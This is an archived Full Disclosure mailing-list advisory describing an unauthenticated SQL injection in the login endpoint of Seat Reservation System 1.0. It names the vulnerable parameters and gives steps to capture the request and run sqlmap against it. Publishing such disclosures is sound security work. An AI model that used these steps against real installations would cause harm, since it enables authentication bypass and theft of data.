lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Fri, 18 Sep 2020 23:34:22 -0400
From: Ava Tester One <>
Subject: [FD] Seat Reservation System 1.0 Unauthenticated SQL Injection

# Title: Seat Reservation System 1.0 - Unauthenticated SQL Injection
# Exploit Author: Rahul Ramkumar
# Date: 2020-09-16
# Vendor Homepage:
# Software Link:
# Version: 1.0

# Description

The file admin_class.php does not perform input validation on the username
and password parameters. An attacker can send malicious input in the post
request to /admin/ajax.php?action=login and bypass authentication, extract
sensitive information etc.


1) Navigate to the admin login page


2) Fill in dummy values for 'username' and 'password' fields and send the
request via an HTTP intercept tool

3) Save the request to file. Example, seat_reservation_sqli.req

POST /seat_reservation/admin/ajax.php?action=login HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 32
DNT: 1
Connection: close


4) Run SQLmap on the file,

sqlmap -r seat_reservation_sqli.req --dbms=mysql --threads=10

Sent through the Full Disclosure mailing list
Web Archives & RSS:

Powered by blists - more mailing lists